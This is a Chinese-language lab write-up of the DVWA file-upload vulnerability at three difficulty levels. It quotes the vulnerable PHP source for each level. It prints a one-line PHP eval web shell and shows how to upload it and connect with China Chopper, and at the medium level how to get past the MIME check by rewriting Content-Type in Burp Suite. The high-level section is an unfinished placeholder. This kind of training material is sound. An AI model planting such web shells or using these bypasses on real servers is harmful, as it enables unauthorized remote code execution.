不定期補充、修正、更新;歡迎大家讨論和指正
目錄
- 概覽
- LOW
-
- 源碼
- MEDIUM
-
- 源碼
- HIGH
-
- 源碼
概覽
檔案上傳漏洞是指由于程式員未對上傳的檔案進行嚴格的驗證和過濾,而導緻的使用者可以越過其本身權限向伺服器上上傳可執行的動态腳本檔案。這裡上傳的檔案可以是木馬,病毒,惡意腳本或者WebShell等。這種攻擊方式是最為直接和有效的,“檔案上傳”本身沒有問題,有問題的是檔案上傳後,伺服器怎麼處理、解釋檔案。如果伺服器的處理邏輯做的不夠安全,則會導緻嚴重的後果。
原文連結:https://blog.csdn.net/qq_42636435/article/details/88096844
環境準備:
win7:192.168.126.135
kali:192.168.126.129
owasp:192.168.126.134
工具:chopper(中國菜刀) BurpSuite
木馬: <?php @eval($_POST['hacker']); ?>
LOW
進入upload、上傳寫好木馬的檔案
複制提示上傳的檔案所在目錄路徑,複制到搜尋欄(記得删除最後的#号),回車得到檔案所在的真實路徑,複制。
進入win7 打開chopper,右鍵建立,輸入複制的檔案所在目錄路徑,以及木馬裡設定的密碼。
登入成功!
源碼
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename( $_FILES['uploaded']['name']);
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
?>
MEDIUM
檢視源碼可以看到檔案上傳的類型以及大小受到了限制,隻能是jpeg格式,注意單純地改檔案字尾名是沒用的。
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000))
這裡涉及到MIME(Multipurpose Internet Mail Extensions,媒體類型 )
MIME類型
可以看到上傳沒用成功。
這時可以用第三方工具将木馬檔案的MIME類型轉換成/image/jpeg
使用BurpSuite的代理和攔截的功能,将浏覽器請求伺服器的http請求攔截并修改。
進入kali 為了友善,直接在kali上的浏覽器設定代理,代理設為127.0.01即可
啟動BurpSuite作為代理,一開始有時會彈出什麼需要JRE功能的更新,無視即可。
進入後無視更新,使用預設配置 next->Start Burp進入
進入proxy代理功能,當攔截開啟時,可以發現在DVWA上傳時左上角一直在重新整理。
修改Content-Type:的内容為image/jpeg後關閉攔截
上傳成功、後面的操作如出一轍。
源碼
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_type = $_FILES['uploaded']['type'];
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
else{
echo '<pre>Your image was not uploaded.</pre>';
}
}
?>
HIGH
源碼
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
else{
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
}
}
?>
- 占坑